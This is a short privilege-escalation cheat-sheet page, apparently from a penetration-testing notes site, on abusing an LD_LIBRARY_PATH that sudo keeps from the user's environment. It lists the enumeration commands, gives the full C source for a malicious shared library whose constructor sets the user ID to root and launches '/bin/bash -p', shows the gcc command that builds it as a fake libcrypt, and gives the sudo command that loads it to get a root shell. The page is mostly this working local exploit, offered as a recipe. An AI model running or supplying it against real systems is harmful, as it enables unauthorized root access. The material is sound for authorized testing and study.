LD_LIBRARY_PATH

Programs running via sudo can inherit variables from the environment of the user. If the env_reset option is set in the /etc/sudoers config file, sudo will run the programs in a new, minimal environment. The env_keep option can be used to keep certain environment variables from the user’s environment. The configured options are displayed when running sudo -l.

The LD_LIBRARY_PATH is inherited from the user's environment. The LD_LIBRARY_PATH contains a list of directories which search for shared libraries first.

Steps

Investigate the sudo-able programs and the libraries used.

# Check if you see any sudo configuration for your usrname
sudo -l

# Check if you have libray for the programs. In this case, apache2
ldd /usr/sbin/iftop
... 
ldd /usr/sbin/apache2

Compile the following code and make it so library.

#include <stdio.h>
#include <stdlib.h>

static void hijack() __attribute__((constructor));

void hijack() {
        unsetenv("LD_LIBRARY_PATH");
        setresuid(0,0,0);
        system("/bin/bash -p");
}

gcc -o /tmp/libcrypt.so.1 -shared -fPIC /home/user/tools/sudo/library_path.c

Execute to escalate the privilege

sudo LD_LIBRARY_PATH=/tmp apache2

PreviousLD_PRELOAD NextSudo via intended functionality

Last updated 10 months ago